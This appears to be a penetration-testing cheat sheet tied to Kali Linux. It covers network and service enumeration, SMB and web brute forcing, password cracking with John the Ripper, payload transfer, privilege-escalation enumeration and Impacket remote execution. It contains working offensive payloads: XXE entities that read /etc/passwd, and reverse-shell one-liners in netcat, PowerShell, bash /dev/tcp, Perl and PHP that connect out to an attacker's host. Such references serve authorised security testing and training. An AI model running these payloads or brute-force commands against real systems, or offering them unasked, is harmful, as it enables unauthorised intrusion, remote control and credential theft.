Offensive Security Tools
Here you will find a useful collection of commands and file resource locations used in Pentesting operations. This reference is will go hand in hand with Kali Linux.
This is intended to be viewed in the blog found here: Offensive Security Cheat Sheet
General Enumeration
NMAP
# NMAP
# About: A network scanning tool that identifies devices, ports, services, and operating systems
# Download: Pre-installed on Kali Linux
# Usage
nmap -p- --min-rate 5000 -sC -sV {IP ADDRESS}
# UDP Scan
sudo nmap -sU {IP ADDRESS}
# Flags
# -p-: scans ALL ports
# --min-rate <number>: Send packets no slower than <number> per second
# -sC: equivalent to --script=default
# -sV: Probe open ports to determine service/version info
# -sU: UDP port scan
NMAP Automator
# NMAP Automator
# About: Useful script that automates multiple enumeration scans in succession
# Download: https://github.com/21y4d/nmapAutomator/blob/master/nmapAutomator.sh
# Usage
./nmapAutomator.sh --host {IP ADDRESS} --type All
# Flags
# --type Network : Shows all live hosts in the host's network (~15 seconds)
# --type Port : Shows all open ports (~15 seconds)
# --type Script : Runs a script scan on found ports (~5 minutes)
# --type Full : Runs a full range port scan, then runs a thorough scan on new ports (~5-10 minutes)
# --type UDP : Runs a UDP scan "requires sudo" (~5 minutes)
# --type Vulns : Runs CVE scan and nmap Vulns scan on all found ports (~5-15 minutes)
# --type Recon : Suggests recon commands, then prompts to automatically run them
# --type All : Runs all the scans (~20-30 minutes)
Port Enumeration
FTP [21]
# FTP
# About: Connect to FTP server
# Download: Pre-installed on Kali Linux
# Usage
ftp {IP ADDRESS}
# Additional Information
# Default Credentials: anonymous
# Directory Command: dir
# Download Command: get
# Upload Command: put
SSH [22]
DNS [53]
TFTP [69]
# TFTP
# About: Connect to TFTP server
# Download: Pre-installed on Kali Linux
# Usage
tftp {IP ADDRESS}
# Additional Information
# Only detectable via UDP scan
# No authentication required
FINGER [79]
Web Server [80, 443]
# Gobuster
# About: Used to brute force web directories
# Download: https://github.com/OJ/gobuster/releases
# Usage
sudo gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http://{IP ADDRESS}
# Search File Extensions
sudo gobuster dir -w /usr/share/wordlists/dirb/big.txt -u http://{IP ADDRESS} -x php,html,htm,sh
# Notes: Not recursive, only digs one level deep
# Alternative word lists & locations
┌──(kali㉿kali)-[/usr/share/wordlists/dirb]
big.txt
catala.txt
common.txt
euskera.txt
extensions_common.txt
indexes.txt
mutations_common.txt
others
small.txt
spanish.txt
stress
vulns
┌──(kali㉿kali)-[/usr/share/wordlists/dirbuster]
apache-user-enum-1.0.txt
apache-user-enum-2.0.txt
directories.jbrofuzz
directory-list-1.0.txt
directory-list-2.3-small.txt
directory-list-lowercase-2.3-small.txt
directory-list-2.3-medium.txt
directory-list-lowercase-2.3-medium.txt
# XXE - External XML Entity
# About: Try against weak XML parsers
# Usage Windows
<!DOCTYPE root [<!ENTITY test SYSTEM 'file:///c:/windows/system32/drivers/etc/hosts'>]>
<data>&test;</data>
# Usage Linux
<!DOCTYPE foo [<!ENTITY example SYSTEM "/etc/passwd"> ]>
<data>&test;</data>
Kerberos [88]
POP3 [110]
SNMP [161]
LDAP [389]
SMB [445]
# SMBCLIENT
# About: Used to connect to SMB
# Download: Pre-installed on Kali Linux
# Usage
# List all SMB Shares
smbclient -L {IP ADDRESS}
# Authenticate with local credentials
smbclient -N \\\\{IP ADDRESS}\\{SHARE}
# Authenticate with Administrator
smbclient -N \\\\{IP ADDRESS}\\{SHARE} -U Administrator
# Brute force SMB user and password list
crackmapexec smb {IP ADDRESS} -u {USER.txt} -p {PASSWORDS.txt} --shares --continue-on-success
# Mount SMB Drive
sudo mount -t cifs //{IP ADDRESS}/{SHARE} /mnt/{SHARE}/
sudo mount -t cifs -o 'username={USERNAME},password={PASSWORD}' //{IP ADDRESS}/{SHARE} /mnt/{SHARE}/
sudo umount {SHARE}
# Get all files
mask ""
recurse ON
prompt OFF
mget *
# {IP ADDRESS}: IP Address of the Server
# {SHARE}: Share name to connect
# {USER.txt}: User list to be brute forced
# {PASSWORD.txt}: Password list to be brute forced
Impacket SMB
# smbclient. py : There are moments where we needed to perform multiple actions between the attacker machine and the target machine. It can be listing shares and files, renaming some file, uploading the binaries or downloading files from the target machine. There are some situations where we even need to create a folder or two on the target machine. Performing such actions can get tricky while working with a shell that can be detected or can close at any time. The smbclient.py script helps us in these situations. It can connect to the Target Machine with the help of a bunch of attributes.
# lookupsid.py : A Security Identifier (SID) is a unique value of variable length that is used to identify a user account. Through a SID User Enumeration, we can extract the information about what users exist and their data. Lookupsid script can enumerate both local and domain users. There is a Metasploit module too for this attack. If you are planning on injecting a target server with a golden or a silver ticket then one of the things that are required is the SID of the 500 user. Lookupsid.py can be used in that scenario.
# reg.py : This Impacket script is ripped straight out of the reg.exe of the Windows OS. Reg.exe is an executable service that can read, modify and delete registry values when used with eh combination of the query, add, delete keywords respectively. We can even begin to express the importance of access to the registry. Registry controls each and every aspect of the system. It can be used to gain information about the various policies, software and also alter some of those policies.
# rpcdump.py : RPC or Remote Procedure Call is when a computer program causes a procedure to execute in different address space which is coded as a normal procedure call. This script can enumerate those endpoints for us. It also matches them to some of the well-known endpoints in order to identify them.
# samrdump.py : Samrdump is an application that retrieves sensitive information about the specified target machine using the Security Account Manager (SAM). It is a remote interface that is accessible under the Distributed Computing Environment / Remote Procedure Calls (DCE/RPC) service. It lists out all the system shares, user accounts, and other useful information about the target’s presence in the local network. The image clearly shows us all the user accounts that are held by the remote machine. Inspecting all the available shares for sensitive data and accessing other user accounts can further reveal valuable information.
# services.py : The services script of the Impacket communicates with Windows services with the help of MSRPC Interface. It can start, stop, delete, read status, config, list, create and change any service. While working on Red Teaming assignments there were so many tasks that could have been simplified if only, we have access to the services of the Target machine. This makes it all a simple task.
# ifmap.py : Ifmap scripts initially bind to the MGMT interface of the Target machine. Then it fetches a list of interface IDs. Then it adds those IDs to another large list of UUIDs it already has in its database. Then it tries to bind each of the interfaces and reports the status of the interface. The status can be listed or listening. Its ability to gather information is unmatched. There is a Metasploit Module that works quite similar to this script is “auxiliary/scanner/dcerpc/endpoint_mapper” The list of UUIDs (Universal Unique Identifier) which are running endpoint-mapper mapped to the unique services. After getting these services, an attacker can search on the internet to find if any of these services are vulnerable to Overflow over RPC.
# getArch.py : All PDUs (Protocol Data Unit) encoded with the NDR64 transfer syntax must use a value of 0x10 for the data representation format label. This value is used only in the transfers of the x64 bit systems. This scripts when provided with a target tried to communicate with the target system and collects the value of the data representation format label. Then it matches it to the NDR64 syntax stored in its code. Then it can provide the information to the attacker if the Operating System is a 64 bit or 32-bit system. We can also provide a list of targets and it can work simultaneously on all the targets.
# netview.py : It is an enumeration tool. It requires the domain name to enumerate hosts. It can also be provided with a list of hosts or targets
# Usage
/usr/share/doc/python3-impacket/examples/{IMPACKET.py} {USERNAME}:{PASSWORD}@{IP ADDRESS}
# {USERNAME}: Valid Windows username
# {PASSWORD}: Valid Windows password
# {IP ADDRESS}: Server IP address
MSSQL [1433]
NFS [2049]
RDP [3389]
WINRM [5985, 5986]
# EVIL WINRM
# About: A tool used to hack WINRM from a linux console
# Download: Pre-installed on Kali Linux
# Usage
evil-winrm -i {IP ADDRESS} -u {USERNAME} -p {PASSWORD}
# Upload a File from client => server in current directory
upload {FILE.exe}
# Note: Requires credentials
# {IP ADDRESS}: IP Address of the Server
# {USERNAME}: User Authentication
# {PASSWORD}: Password Authentication
# {FILE.exe}: File to be uploaded from client machine
Password Cracking
John The Ripper
# About: A tool used to crack passwords, hashes, and zip files
# Download: Pre-installed on Kali Linux
# Usage - Crack a zip file {FILE.zip} and output hash into text file {FILE.txt}
sudo zip2john {FILE.zip} > {FILE.txt}
# Usage - Crack a rar file {FILE.rar} and output hash into text file {FILE.txt}
sudo rar2john {FILE.rar} > {FILE.txt}
# Usage - Crack a password file {FILE.txt}
john -w=/usr/share/wordlists/rockyou.txt {FILE.txt}
# --format={HASH}: Specifiy a hash type to crack (see below)
john --format=Raw-MD5 {FILE.txt}
:'
descrypt, bsdicrypt, md5crypt, md5crypt-long, bcrypt, scrypt, LM, AFS,
tripcode, AndroidBackup, adxcrypt, agilekeychain, aix-ssha1, aix-ssha256,
aix-ssha512, andOTP, ansible, argon2, as400-des, as400-ssha1, asa-md5,
AxCrypt, AzureAD, BestCrypt, BestCryptVE4, bfegg, Bitcoin, BitLocker,
bitshares, Bitwarden, BKS, Blackberry-ES10, WoWSRP, Blockchain, chap,
Clipperz, cloudkeychain, dynamic_n, cq, CRC32, cryptoSafe, sha1crypt,
sha256crypt, sha512crypt, Citrix_NS10, dahua, dashlane, diskcryptor, Django,
django-scrypt, dmd5, dmg, dominosec, dominosec8, DPAPImk, dragonfly3-32,
dragonfly3-64, dragonfly4-32, dragonfly4-64, Drupal7, eCryptfs, eigrp,
electrum, EncFS, enpass, EPI, EPiServer, ethereum, fde, Fortigate256,
Fortigate, FormSpring, FVDE, geli, gost, gpg, HAVAL-128-4, HAVAL-256-3, hdaa,
hMailServer, hsrp, IKE, ipb2, itunes-backup, iwork, KeePass, keychain,
keyring, keystore, known_hosts, krb4, krb5, krb5asrep, krb5pa-sha1, krb5tgs,
krb5-17, krb5-18, krb5-3, kwallet, lp, lpcli, leet, lotus5, lotus85, LUKS,
MD2, mdc2, MediaWiki, monero, money, MongoDB, scram, Mozilla, mscash,
mscash2, MSCHAPv2, mschapv2-naive, krb5pa-md5, mssql, mssql05, mssql12,
multibit, mysqlna, mysql-sha1, mysql, net-ah, nethalflm, netlm, netlmv2,
net-md5, netntlmv2, netntlm, netntlm-naive, net-sha1, nk, notes, md5ns,
nsec3, NT, o10glogon, o3logon, o5logon, ODF, Office, oldoffice,
OpenBSD-SoftRAID, openssl-enc, oracle, oracle11, Oracle12C, osc, ospf,
Padlock, Palshop, Panama, PBKDF2-HMAC-MD4, PBKDF2-HMAC-MD5, PBKDF2-HMAC-SHA1,
PBKDF2-HMAC-SHA256, PBKDF2-HMAC-SHA512, PDF, PEM, pfx, pgpdisk, pgpsda,
pgpwde, phpass, PHPS, PHPS2, pix-md5, PKZIP, po, postgres, PST, PuTTY,
pwsafe, qnx, RACF, RACF-KDFAES, radius, RAdmin, RAKP, rar, RAR5, Raw-SHA512,
Raw-Blake2, Raw-Keccak, Raw-Keccak-256, Raw-MD4, Raw-MD5, Raw-MD5u, Raw-SHA1,
Raw-SHA1-AxCrypt, Raw-SHA1-Linkedin, Raw-SHA224, Raw-SHA256, Raw-SHA3,
Raw-SHA384, restic, ripemd-128, ripemd-160, rsvp, RVARY, Siemens-S7,
Salted-SHA1, SSHA512, sapb, sapg, saph, sappse, securezip, 7z, Signal, SIP,
skein-256, skein-512, skey, SL3, Snefru-128, Snefru-256, LastPass, SNMP,
solarwinds, SSH, sspr, Stribog-256, Stribog-512, STRIP, SunMD5, SybaseASE,
Sybase-PROP, tacacs-plus, tcp-md5, telegram, tezos, Tiger, tc_aes_xts,
tc_ripemd160, tc_ripemd160boot, tc_sha512, tc_whirlpool, vdi, OpenVMS, vmx,
VNC, vtp, wbb3, whirlpool, whirlpool0, whirlpool1, wpapsk, wpapsk-pmk,
xmpp-scram, xsha, xsha512, zed, ZIP, ZipMonster, plaintext, has-160,
HMAC-MD5, HMAC-SHA1, HMAC-SHA224, HMAC-SHA256, HMAC-SHA384, HMAC-SHA512,
dummy, crypt
'
FFUF
# FFUF
# About: A tool used to brute force web credentials
# Download: Pre-installed on Kali Linux
# Usage - One variable FUZZ
ffuf -c -request {FILE.req} -request-proto http -w /usr/share/seclists/Passwords/probable-v2-top1575.txt -fr "{FILTER}"
# EXAMPLE {FILE}
username=admin$password=FUZZ
Payload File Transfer
Python Server [STEP 1]
# Python Server
# About: A python command used to open a server on the client machine
# Download: Pre-installed on Kali Linux
# USAGE - Host on client machine
sudo python3 -m http.server {PORT}
# {PORT}: Port to open for file transfer
WGET [STEP 2]
# WGET
# About: A command used to download files on the current machine
# Download: Pre-installed on Kali Linux
# Usage - Download on server machine
wget http://{IP ADDRESS}/{FILE} -outfile {FILE}
# {IP ADDRESS}: IP Address of the client from step one (python server)
# {FILE}: The payload to be transferred
Privilege Escalation
Windows - Winpeas
# Windows Enumeration Commands
# CMD
#Me
net users %username%
#All local users
net users
#Groups
net localgroup
#Who is inside Administrators group
net localgroup Administrators
#Check the privileges
whoami /all
# PS
Get-WmiObject -Class Win32_UserAccount
Get-LocalUser | ft Name,Enabled,LastLogon
Get-ChildItem C:\Users -Force | select Name
Get-LocalGroupMember Administrators | ft Name, PrincipalSource
# List All Users in a Domain
Import-Module ActiveDirectory; Get-ADUser -Identity <username> - properties *
# List All Users in a Group
Import-Module ActiveDirectory; Get-ADPrincipalGroupMembership <username> | select Administrator
Linux - Linpeas
# Linux Enumeration Commands
#Check commands you can execute with sudo
sudo -l
#Find all SUID binaries
find / -perm -4000 2>/dev/null
# List All Users on a System
cat /etc/passwd
# List All Users on a System (cleaner, only users)
awk –F’:‘ ’{ print $1}’ /etc/passwd
# List All Logged in Users
who | awk ‘{print $1}’ | sort | uniq | tr ‘\n’ ‘ ’
# Web files
ls -alhR /var/www/ 2>/dev/null
ls -alhR /srv/www/htdocs/ 2>/dev/null
ls -alhR /usr/local/www/apache22/data/
ls -alhR /opt/lampp/htdocs/ 2>/dev/null
Reverse Shell
NC Listen - Client [STEP 1]
# About: A command used to listen to requests from a defined port
# Download: Pre-installed on Kali Linux
# Usage
sudo nc -lnvp {PORT}
# {PORT}: Select the port used to listen
NC Execute - Server [STEP 2]
# With netcat installed
# Usage - Windows
nc.exe -e cmd.exe {IP ADDRESS} {PORT}
# Usage - Linux
nc {IP ADDRESS} {PORT} –e /bin/bash
# ===========================================
# Without netcat installed
# Usage - Windows
powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("{IP ADDRESS}",{PORT});$s=$client.GetStream();[byte[]]$b=0..65535|%{0};while(($i = $s.Read($b, 0, $b.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);$sb = (iex $data 2>&1 | Out-String );$sb2=$sb+"PS "+(pwd).Path+"> ";$sbt = ([text.encoding]::ASCII).GetBytes($sb2);$s.Write($sbt,0,$sbt.Length);$s.Flush()};$client.Close()
# Usage - Linux
bash -i >& /dev/tcp/{IP ADDRESS}/{PORT} 0>&1
# Usage - Perl
perl -e ‘use Socket;$i=”{IP ADDRESS}″;$p={PORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};’
# Usage - PHP
php -r ‘$sock=fsockopen(“{IP ADDRESS}”,{PORT});exec(“/bin/sh -i <&3 >&3 2>&3”);’
# Alternative - transfer payload via file transfer and execute binary
# {IP ADDRESS}: IP Address of the client from step one (listener)
# {PORT}: Port of the client from step one (listener)
Impacket Remote Code Execution
# atexec.py : Atexec.py: Impacket has a python library that helps an attacker to access the victim host machine remotely through DCE/RPC based protocol used by CIFS hosts to access/control the AT-Scheduler Service and execute the arbitrary system command.
# PsExec.py : PSEXEC like functionality example using RemComSvc, with the help of python script we can use this module for connecting host machine
# netview.py : It is an enumeration tool. It requires the domain name to enumerate hosts. It can also be provided with a list of hosts or targets
# Smbexec.py : Smbexec.py uses a similar approach to psexec w/o using RemComSvc
# wmiexec.py : A similar approach to smbexec but executing commands through WMI. The main advantage here is it runs under the user (has to be Admin) account, not SYSTEM, plus, it doesn’t generate noisy messages in the event log that smbexec.py does when creating a service.
# Usage
/usr/share/doc/python3-impacket/examples/{IMPACKET.py} {USERNAME}:{PASSWORD}@{IP ADDRESS}
# {USERNAME}: Valid Windows username
# {PASSWORD}: Valid Windows password
# {IP ADDRESS}: Server IP address
Reverse Shell Generator
Shell Upgrade
Python
# About: A command to spawn a new shell using python
# Download: May or may not be installed on server machine
# Usage
python3 -c 'import pty;pty.spawn("/bin/bash")'
python -c 'import pty;pty.spawn("/bin/bash")'
# Additional Functionality
CTRL&Z
stty raw -echo; fg;
export TERM=xterm